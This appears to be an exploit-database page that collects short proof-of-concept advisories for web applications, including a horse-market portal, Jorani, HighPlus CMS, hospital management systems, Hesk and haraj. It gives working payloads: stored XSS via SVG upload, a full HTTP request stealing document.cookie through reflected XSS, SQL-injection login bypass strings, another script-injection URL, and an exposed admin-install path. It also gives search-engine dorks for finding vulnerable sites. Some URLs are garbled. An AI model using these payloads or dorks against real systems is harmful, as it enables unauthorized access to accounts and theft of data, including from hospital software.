Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Horse Market Sell & Rent Portal Script V1.5.7 xss via file uploads Vulnerability | | # Author : indoushka | | # Telegram : @indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725 | | # Dork : "InfinityMarket MultiPurpose Script is a multi-solution product made with simplicity in mind so you can benefit " | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] singup your user & go to /index.php/frontend/myprofile/en#content [+] choose your file svg and upload it . [+] http://localhost/files/index.svg Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>## Title: Jorani -v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure ## Author: nu11secur1ty ## Date: 08/27/2023 ## Vendor: https://jorani.org/ ## Software: https://demo.jorani.org/session/login ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Reference: https://portswigger.net/web-security/information-disclosure ## Description: The value of the `language request` parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the token session and he can discover sensitive information for the server. STATUS: HIGH-Vulnerability [+]Exploit: ```POST POST /session/login HTTP/1.1 Host: demo.jorani.org Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACK Origin: http://demo.jorani.org Upgrade-Insecure-Requests: 1 Referer: http://demo.jorani.org/session/login Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 183 csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue= ``` [+]Response: ```HTTP HTTP/1.1 200 OK date: Sun, 27 Aug 2023 06:03:04 GMT content-type: text/html; charset=UTF-8 Content-Length: 681 server: Apache x-powered-by: PHP/8.2 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; SameSite=Strict set-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd; expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly; SameSite=Lax last-modified: Sun, 27 Aug 2023 06:03:04 GMT vary: Accept-Encoding cache-control: private, no-cache, no-store, proxy-revalidate, no-transform, must-revalidate pragma: no-cache x-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1 x-iplb-instance: 27474 connection: close <div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"> <h4>A PHP Error was encountered</h4> Severity: 8192 Message: strlen(): Passing null to parameter #1 ($string) of type string is deprecated Filename: controllers/Connection.php Line Number: 126 </div> <div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"> <h4>A PHP Error was encountered</h4> Severity: Warning Message: Cannot modify header information - headers already sent by (output started at /home/decouvric/demo.jorani.org/system/core/Exceptions.php:272) Filename: helpers/url_helper.php Line Number: 565 </div> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html) ## Time spend: 01:35:00 </code></pre>

<pre><code>==================================================================================================================================== | # Title : HighPlus CMS v0.1.3 Auth By pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://highplus.co.th/Highplus/login/AFMADS001.php | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] use payload : user & pass = ' or 0=0 # [+] http://127.0.0.1wwwhighpluscoth/main/login.html Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>====================================================================================================================================== | # Title : Hospital HMS v2.7 Auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://apptmedical.com/ | | # Dork : © 2018 HMS. All rights reserved | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Use Payload : admin & pass = '=' 'or' [+] user login : http://target_site/hms/user-login.php [+] doctor Login : http://target_site/hms/doctor/ [+] admin login : http://target_site/hms/admin/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>====================================================================================================================================== | # Title : Hospital HMS v2 auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : http://p30vel.ir | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Use admin : admin'-- - pass : indoushka [+] http://www127.0.0.1/arvindbijaniyacom/admin/admin_pannel/view_service/index.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Hesk Rtl CMS v1 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://p30vel.ir | | # Dork : فارسی سازی توسط وحید مجیدی / اسکریپت دات کام | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] This vulnerability affects : /Hesk/ajax.php. [+] Attack details : URI was set to ;997612"():;991161 The input is reflected inside <script> tag between double quotes Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Hasan MWB v1 - XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | | # Vendor : http://sourceforge.net/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt> [+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : haraj V1.1 Add ADmin Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://www.mediafire.com/file/ky3e6rtnb23mddd/free_haraj_v1.1.zip | | # Dork : V1.1 free برمجة وتصميم : سكربت حراج | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /setup/install.php?act=user [+] http://127.0.0.1/adplusgq/setup/install.php?act=user Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>